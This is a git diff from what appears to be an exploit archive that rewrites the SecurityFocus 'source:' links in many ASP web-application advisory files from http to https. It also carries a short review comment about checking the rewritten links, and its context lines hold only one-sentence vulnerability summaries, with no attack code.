@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31740/info +source: https://www.securityfocus.com/bid/31740/info ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32498.txt b/exploits/asp/webapps/32498.txt index 241e46bea..b35ade895 100644 --- a/exploits/asp/webapps/32498.txt +++ b/exploits/asp/webapps/32498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31849/info +source: https://www.securityfocus.com/bid/31849/info Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32500.txt b/exploits/asp/webapps/32500.txt index 976e78e0f..5738586b1 100644 --- a/exploits/asp/webapps/32500.txt +++ b/exploits/asp/webapps/32500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31852/info +source: https://www.securityfocus.com/bid/31852/info Bahar Download Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32549.txt b/exploits/asp/webapps/32549.txt index 4e5b7b1a3..3cad91f19 100644 --- a/exploits/asp/webapps/32549.txt +++ b/exploits/asp/webapps/32549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31992/info +source: https://www.securityfocus.com/bid/31992/info Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32577.txt b/exploits/asp/webapps/32577.txt index d7b6f983e..72909d673 100644 --- a/exploits/asp/webapps/32577.txt +++ b/exploits/asp/webapps/32577.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32239/info +source: https://www.securityfocus.com/bid/32239/info Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32601.txt b/exploits/asp/webapps/32601.txt index 196b934e6..164e39c30 100644 --- a/exploits/asp/webapps/32601.txt +++ b/exploits/asp/webapps/32601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32526/info +source: https://www.securityfocus.com/bid/32526/info Ocean12 FAQ Manager Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32602.txt b/exploits/asp/webapps/32602.txt index 85af1994e..fdef055c5 100644 --- a/exploits/asp/webapps/32602.txt +++ b/exploits/asp/webapps/32602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32527/info +source: https://www.securityfocus.com/bid/32527/info Multiple Ocean12 products are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32603.txt b/exploits/asp/webapps/32603.txt index 3d09d8705..f4df2afcf 100644 --- a/exploits/asp/webapps/32603.txt +++ b/exploits/asp/webapps/32603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32528/info +source: https://www.securityfocus.com/bid/32528/info Ocean12 Mailing List Manager Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32604.txt b/exploits/asp/webapps/32604.txt index 15bc97384..c30f86810 100644 --- a/exploits/asp/webapps/32604.txt +++ b/exploits/asp/webapps/32604.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32529/info +source: https://www.securityfocus.com/bid/32529/info ParsBlogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32609.txt b/exploits/asp/webapps/32609.txt index bae427db8..4e61ab7c3 100644 --- a/exploits/asp/webapps/32609.txt +++ b/exploits/asp/webapps/32609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32566/info +source: https://www.securityfocus.com/bid/32566/info Pre Classified Listings is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32610.txt b/exploits/asp/webapps/32610.txt index 3939da9fd..b7c765c2f 100644 --- a/exploits/asp/webapps/32610.txt +++ b/exploits/asp/webapps/32610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32567/info +source: https://www.securityfocus.com/bid/32567/info Pre Classified Listings is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32611.txt b/exploits/asp/webapps/32611.txt index dcc83ed75..5a74d1d4b 100644 --- a/exploits/asp/webapps/32611.txt +++ b/exploits/asp/webapps/32611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32568/info +source: https://www.securityfocus.com/bid/32568/info CodeToad ASP Shopping Cart Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32626.txt b/exploits/asp/webapps/32626.txt index fffc4e49f..59d2c7fc7 100644 --- a/exploits/asp/webapps/32626.txt +++ b/exploits/asp/webapps/32626.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32628.txt b/exploits/asp/webapps/32628.txt index a8a1f74f8..be8bb7b9c 100644 --- a/exploits/asp/webapps/32628.txt +++ b/exploits/asp/webapps/32628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32629.txt b/exploits/asp/webapps/32629.txt index 939ca6694..1c5a521bd 100644 --- a/exploits/asp/webapps/32629.txt +++ b/exploits/asp/webapps/32629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32630.txt b/exploits/asp/webapps/32630.txt index 7fbf51cce..33413f4be 100644 --- a/exploits/asp/webapps/32630.txt +++ b/exploits/asp/webapps/32630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32572/info +source: https://www.securityfocus.com/bid/32572/info Pre ASP Job Board is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32635.txt b/exploits/asp/webapps/32635.txt index a66905f2f..3b9904361 100644 --- a/exploits/asp/webapps/32635.txt +++ b/exploits/asp/webapps/32635.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32599/info +source: https://www.securityfocus.com/bid/32599/info Jbook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32653.txt b/exploits/asp/webapps/32653.txt index 3aa098ceb..03c843e89 100644 --- a/exploits/asp/webapps/32653.txt +++ b/exploits/asp/webapps/32653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32706/info +source: https://www.securityfocus.com/bid/32706/info Professional Download Assistant is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32658.txt b/exploits/asp/webapps/32658.txt index 078054866..6993101fd 100644 --- a/exploits/asp/webapps/32658.txt +++ b/exploits/asp/webapps/32658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32809/info +source: https://www.securityfocus.com/bid/32809/info ASP-DEV XM Events Diary is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32683.txt b/exploits/asp/webapps/32683.txt index 417dfce67..f58ac82cd 100644 --- a/exploits/asp/webapps/32683.txt +++ b/exploits/asp/webapps/32683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33041/info +source: https://www.securityfocus.com/bid/33041/info Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32687.txt b/exploits/asp/webapps/32687.txt index 55e80f3ca..5d9c32770 100644 --- a/exploits/asp/webapps/32687.txt +++ b/exploits/asp/webapps/32687.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33045/info +source: https://www.securityfocus.com/bid/33045/info Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32716.html b/exploits/asp/webapps/32716.html index 02d0a1b7b..37702f5ac 100644 --- a/exploits/asp/webapps/32716.html +++ b/exploits/asp/webapps/32716.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33217/info +source: https://www.securityfocus.com/bid/33217/info Comersus Cart is prone to a vulnerability that can result in unauthorized access. diff --git a/exploits/asp/webapps/32729.txt b/exploits/asp/webapps/32729.txt index 34412d1fe..eb582ca04 100644 --- a/exploits/asp/webapps/32729.txt +++ b/exploits/asp/webapps/32729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33305/info +source: https://www.securityfocus.com/bid/33305/info LinksPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32730.txt b/exploits/asp/webapps/32730.txt index d8855a826..506151700 100644 --- a/exploits/asp/webapps/32730.txt +++ b/exploits/asp/webapps/32730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33306/info +source: https://www.securityfocus.com/bid/33306/info Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32731.txt b/exploits/asp/webapps/32731.txt index d2f08f2f9..e06357420 100644 --- a/exploits/asp/webapps/32731.txt +++ b/exploits/asp/webapps/32731.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33306/info +source: https://www.securityfocus.com/bid/33306/info Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32735.txt b/exploits/asp/webapps/32735.txt index d0ffa608d..6d7da05a3 100644 --- a/exploits/asp/webapps/32735.txt +++ b/exploits/asp/webapps/32735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33314/info +source: https://www.securityfocus.com/bid/33314/info DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/32736.txt b/exploits/asp/webapps/32736.txt index 9c86c2893..23b74f6bb 100644 --- a/exploits/asp/webapps/32736.txt +++ b/exploits/asp/webapps/32736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33314/info +source: https://www.securityfocus.com/bid/33314/info DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/32748.txt b/exploits/asp/webapps/32748.txt index 97473579a..6811ed365 100644 --- a/exploits/asp/webapps/32748.txt +++ b/exploits/asp/webapps/32748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33411/info +source: https://www.securityfocus.com/bid/33411/info BBSXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32750.txt b/exploits/asp/webapps/32750.txt index 8c3ff5dac..87889ff5a 100644 --- a/exploits/asp/webapps/32750.txt +++ b/exploits/asp/webapps/32750.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33416/info +source: https://www.securityfocus.com/bid/33416/info OBLOG is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32756.txt b/exploits/asp/webapps/32756.txt index 2806e4193..918c48d4d 100644 --- a/exploits/asp/webapps/32756.txt +++ b/exploits/asp/webapps/32756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33431/info +source: https://www.securityfocus.com/bid/33431/info LDF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32758.txt b/exploits/asp/webapps/32758.txt index ab285c406..4f3956cd3 100644 --- a/exploits/asp/webapps/32758.txt +++ b/exploits/asp/webapps/32758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33439/info +source: https://www.securityfocus.com/bid/33439/info Lootan is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32797.txt b/exploits/asp/webapps/32797.txt index 61614c3ef..67d6ee176 100644 --- a/exploits/asp/webapps/32797.txt +++ b/exploits/asp/webapps/32797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33721/info +source: https://www.securityfocus.com/bid/33721/info Banking@Home is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32833.txt b/exploits/asp/webapps/32833.txt index 4d4ca6799..8377eada3 100644 --- a/exploits/asp/webapps/32833.txt +++ b/exploits/asp/webapps/32833.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33957/info +source: https://www.securityfocus.com/bid/33957/info Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32874.txt b/exploits/asp/webapps/32874.txt index 94968465f..ce28e0d79 100644 --- a/exploits/asp/webapps/32874.txt +++ b/exploits/asp/webapps/32874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34227/info +source: https://www.securityfocus.com/bid/34227/info BlogEngine.NET is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/32882.txt b/exploits/asp/webapps/32882.txt index 932f84f9e..718b306f7 100644 --- a/exploits/asp/webapps/32882.txt +++ b/exploits/asp/webapps/32882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34341/info +source: https://www.securityfocus.com/bid/34341/info SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/32888.txt b/exploits/asp/webapps/32888.txt index d1459594e..2c556b3ba 100644 --- a/exploits/asp/webapps/32888.txt +++ b/exploits/asp/webapps/32888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34349/info +source: https://www.securityfocus.com/bid/34349/info Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32898.txt b/exploits/asp/webapps/32898.txt index aec897c40..c2f8388b3 100644 --- a/exploits/asp/webapps/32898.txt +++ b/exploits/asp/webapps/32898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34463/info +source: https://www.securityfocus.com/bid/34463/info Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
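Review bot: line 1 of 32898.txt (the `source:` reference) is switched from http to https with nothing in the visible diff showing that the https URL still serves BID 34463. This is the file's provenance line, so confirm the rewritten link resolves before merging. Also state in the commit message that the change is a mechanical scheme rewrite applied identically to each file, so a reviewer can check completeness by searching for any remaining `http://www.securityfocus.com` references.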
diff --git a/exploits/asp/webapps/32903.txt b/exploits/asp/webapps/32903.txt index 78f3f3e04..a1bd515cc 100644 --- a/exploits/asp/webapps/32903.txt +++ b/exploits/asp/webapps/32903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34491/info +source: https://www.securityfocus.com/bid/34491/info People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32953.vbs b/exploits/asp/webapps/32953.vbs index 7ec016801..d52477701 100644 --- a/exploits/asp/webapps/32953.vbs +++ b/exploits/asp/webapps/32953.vbs @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34701/info +source: https://www.securityfocus.com/bid/34701/info PJBlog3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33009.txt b/exploits/asp/webapps/33009.txt index e980368c5..759be648d 100644 --- a/exploits/asp/webapps/33009.txt +++ b/exploits/asp/webapps/33009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35074/info +source: https://www.securityfocus.com/bid/35074/info DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33171.txt b/exploits/asp/webapps/33171.txt index 9e4e4a731..47a3ee881 100644 --- a/exploits/asp/webapps/33171.txt +++ b/exploits/asp/webapps/33171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36049/info +source: https://www.securityfocus.com/bid/36049/info DUgallery is prone to an authentication-bypass vulnerability. diff --git a/exploits/asp/webapps/33236.txt b/exploits/asp/webapps/33236.txt index e540f8309..5af5715f9 100644 --- a/exploits/asp/webapps/33236.txt +++ b/exploits/asp/webapps/33236.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36480/info +source: https://www.securityfocus.com/bid/36480/info MaxWebPortal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33268.html b/exploits/asp/webapps/33268.html index f41d084e7..b0bd1fbbe 100644 --- a/exploits/asp/webapps/33268.html +++ b/exploits/asp/webapps/33268.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36605/info +source: https://www.securityfocus.com/bid/36605/info AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33361.txt b/exploits/asp/webapps/33361.txt index 2dbf18571..16177012e 100644 --- a/exploits/asp/webapps/33361.txt +++ b/exploits/asp/webapps/33361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37045/info +source: https://www.securityfocus.com/bid/37045/info Multiple JiRo's products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33647.txt b/exploits/asp/webapps/33647.txt index 143e8a351..9f4430b4a 100644 --- a/exploits/asp/webapps/33647.txt +++ b/exploits/asp/webapps/33647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38252/info +source: https://www.securityfocus.com/bid/38252/info Portrait Campaign Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33704.txt b/exploits/asp/webapps/33704.txt index 7e5d04e6c..d9e41b155 100644 --- a/exploits/asp/webapps/33704.txt +++ b/exploits/asp/webapps/33704.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38542/info +source: https://www.securityfocus.com/bid/38542/info BBSXP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33715.txt b/exploits/asp/webapps/33715.txt index 266eda89b..a470a2895 100644 --- a/exploits/asp/webapps/33715.txt +++ b/exploits/asp/webapps/33715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38573/info +source: https://www.securityfocus.com/bid/38573/info Spectrum Software WebManager CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33720.txt b/exploits/asp/webapps/33720.txt index 24fec50ac..45c46d4e2 100644 --- a/exploits/asp/webapps/33720.txt +++ b/exploits/asp/webapps/33720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38582/info +source: https://www.securityfocus.com/bid/38582/info Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33721.txt b/exploits/asp/webapps/33721.txt index c056c654d..134a9a7c1 100644 --- a/exploits/asp/webapps/33721.txt +++ b/exploits/asp/webapps/33721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38592/info +source: https://www.securityfocus.com/bid/38592/info Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33722.txt b/exploits/asp/webapps/33722.txt index 4c1cda04f..b418f955c 100644 --- a/exploits/asp/webapps/33722.txt +++ b/exploits/asp/webapps/33722.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38601/info +source: https://www.securityfocus.com/bid/38601/info ASPCode CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33728.txt b/exploits/asp/webapps/33728.txt index 5ca94be9f..378f01407 100644 --- a/exploits/asp/webapps/33728.txt +++ b/exploits/asp/webapps/33728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38612/info +source: https://www.securityfocus.com/bid/38612/info IBM ENOVIA SmarTeam is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33730.txt b/exploits/asp/webapps/33730.txt index 7c91f5551..5773072c7 100644 --- a/exploits/asp/webapps/33730.txt +++ b/exploits/asp/webapps/33730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38630/info +source: https://www.securityfocus.com/bid/38630/info Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33758.txt b/exploits/asp/webapps/33758.txt index 8e910604f..3ed8db79a 100644 --- a/exploits/asp/webapps/33758.txt +++ b/exploits/asp/webapps/33758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38719/info +source: https://www.securityfocus.com/bid/38719/info Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33761.txt b/exploits/asp/webapps/33761.txt index 1f346f0cd..d27752d39 100644 --- a/exploits/asp/webapps/33761.txt +++ b/exploits/asp/webapps/33761.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38734/info +source: https://www.securityfocus.com/bid/38734/info Pars CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33825.txt b/exploits/asp/webapps/33825.txt index e215b9e49..d2402e3bd 100644 --- a/exploits/asp/webapps/33825.txt +++ b/exploits/asp/webapps/33825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39311/info +source: https://www.securityfocus.com/bid/39311/info Ziggurat Farsi CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33840.txt b/exploits/asp/webapps/33840.txt index e8eac175c..f837f97a0 100644 --- a/exploits/asp/webapps/33840.txt +++ b/exploits/asp/webapps/33840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39534/info +source: https://www.securityfocus.com/bid/39534/info Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/33923.txt b/exploits/asp/webapps/33923.txt index dc5e56a1d..396e82cee 100644 --- a/exploits/asp/webapps/33923.txt +++ b/exploits/asp/webapps/33923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39892/info +source: https://www.securityfocus.com/bid/39892/info SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33959.txt b/exploits/asp/webapps/33959.txt index 5fae58c30..11b3a8e8d 100644 --- a/exploits/asp/webapps/33959.txt +++ b/exploits/asp/webapps/33959.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39999/info +source: https://www.securityfocus.com/bid/39999/info Multiple Consona (formerly SupportSoft) products are prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/33992.txt b/exploits/asp/webapps/33992.txt index 94a317185..83726a821 100644 --- a/exploits/asp/webapps/33992.txt +++ b/exploits/asp/webapps/33992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40201/info +source: https://www.securityfocus.com/bid/40201/info Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34034.txt b/exploits/asp/webapps/34034.txt index 943a1bebc..c7af38730 100644 --- a/exploits/asp/webapps/34034.txt +++ b/exploits/asp/webapps/34034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40357/info +source: https://www.securityfocus.com/bid/40357/info cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34180.txt b/exploits/asp/webapps/34180.txt index 983b31aa0..aabdb0a49 100644 --- a/exploits/asp/webapps/34180.txt +++ b/exploits/asp/webapps/34180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41042/info +source: https://www.securityfocus.com/bid/41042/info webConductor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34194.txt b/exploits/asp/webapps/34194.txt index df00d4d03..ff5ced8eb 100644 --- a/exploits/asp/webapps/34194.txt +++ b/exploits/asp/webapps/34194.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41124/info +source: https://www.securityfocus.com/bid/41124/info Lois Software WebDB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34221.txt b/exploits/asp/webapps/34221.txt index b307bed02..44f482453 100644 --- a/exploits/asp/webapps/34221.txt +++ b/exploits/asp/webapps/34221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41224/info +source: https://www.securityfocus.com/bid/41224/info Iatek PortalApp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34343.txt b/exploits/asp/webapps/34343.txt index d6d41d8b6..379b1bbbe 100644 --- a/exploits/asp/webapps/34343.txt +++ b/exploits/asp/webapps/34343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41746/info +source: https://www.securityfocus.com/bid/41746/info MOJO IWMS is prone to a cookie-manipulation vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34344.txt b/exploits/asp/webapps/34344.txt index 313cacfef..53391dcf2 100644 --- a/exploits/asp/webapps/34344.txt +++ b/exploits/asp/webapps/34344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41747/info +source: https://www.securityfocus.com/bid/41747/info Pre Jobo.NET is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34376.txt b/exploits/asp/webapps/34376.txt index eaa427105..7b1eec54c 100644 --- a/exploits/asp/webapps/34376.txt +++ b/exploits/asp/webapps/34376.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41970/info +source: https://www.securityfocus.com/bid/41970/info e-Courier CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34380.txt b/exploits/asp/webapps/34380.txt index 582ec8947..1d5d43ed0 100644 --- a/exploits/asp/webapps/34380.txt +++ b/exploits/asp/webapps/34380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41995/info +source: https://www.securityfocus.com/bid/41995/info Active Business Directory is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34397.txt b/exploits/asp/webapps/34397.txt index 881040edd..c418f4c32 100644 --- a/exploits/asp/webapps/34397.txt +++ b/exploits/asp/webapps/34397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42164/info +source: https://www.securityfocus.com/bid/42164/info Activedition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34411.txt b/exploits/asp/webapps/34411.txt index d0f75f6e1..d18e7a415 100644 --- a/exploits/asp/webapps/34411.txt +++ b/exploits/asp/webapps/34411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42243/info +source: https://www.securityfocus.com/bid/42243/info DT Centrepiece is prone to multiple cross-site scripting vulnerabilities and multiple security-bypass vulnerabilities. diff --git a/exploits/asp/webapps/34429.txt b/exploits/asp/webapps/34429.txt index baae74216..9814ec3d1 100644 --- a/exploits/asp/webapps/34429.txt +++ b/exploits/asp/webapps/34429.txt 
